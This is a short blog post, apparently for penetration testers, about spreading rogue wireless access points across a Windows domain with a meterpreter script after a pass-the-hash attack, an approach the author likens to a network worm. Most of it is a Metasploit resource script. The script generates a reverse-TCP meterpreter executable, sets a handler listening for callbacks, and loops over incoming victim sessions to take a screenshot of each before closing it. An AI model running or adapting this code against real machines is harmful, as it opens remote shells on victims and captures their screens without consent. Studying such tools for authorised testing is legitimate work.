banner

[Pentesting] Deploying rogue ap points throughout a domain

By Zitstif
 

¡This post is aimed to pentester or any other curious people!

For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008.

If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using this script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm.

The meterpreter script assumes that you have AT LEAST Administrator privileges!, you need obtain this privileges before run script.

Example of use with metasploit console script! (Download it!)
 

2
# Quick RC script to demonstrate the Ruby blocks in RC files
3
#
4
5
#
6
# Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
7
# $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
8
#
9
10
use exploit/multi/handler
11
set PAYLOAD windows/meterpreter/reverse_tcp
12
set LPORT 4444
13
set LHOST 192.168.0.228
14
set ExitOnSession false
15
16
exploit -j
17
18
# The first sleep below is not necessary, but makes the output cleaner
19
<ruby>
20
	sleep(1)
21
22
	print_status("Waiting on an incoming sessions...")
23
	while (true)
24
		framework.sessions.each_pair do |sid,s|
25
			thost = s.tunnel_peer.split(":")[0]
26
27
			# Ensure that stdapi has been loaded before running
28
			if s.ext.aliases['stdapi']
29
				print_status("Screenshotting session #{sid} #{thost}...")
30
				s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
31
				print_status("Closing session #{sid} #{thost}...")
32
				s.kill
33
			else
34
				print_status("Session #{sid} #{thost} active, but not yet configured")
35
			end
36
37
		end
38
		sleep(1)
39
	end
40
41
	print_status("All done")
42
</ruby>
43
44
# Kill all open sessions
45
sessions -K
46
47
# Exit the console (optional)
48
exit


Donwload rogue ap script.

No hay comentarios :

Publicar un comentario en la entrada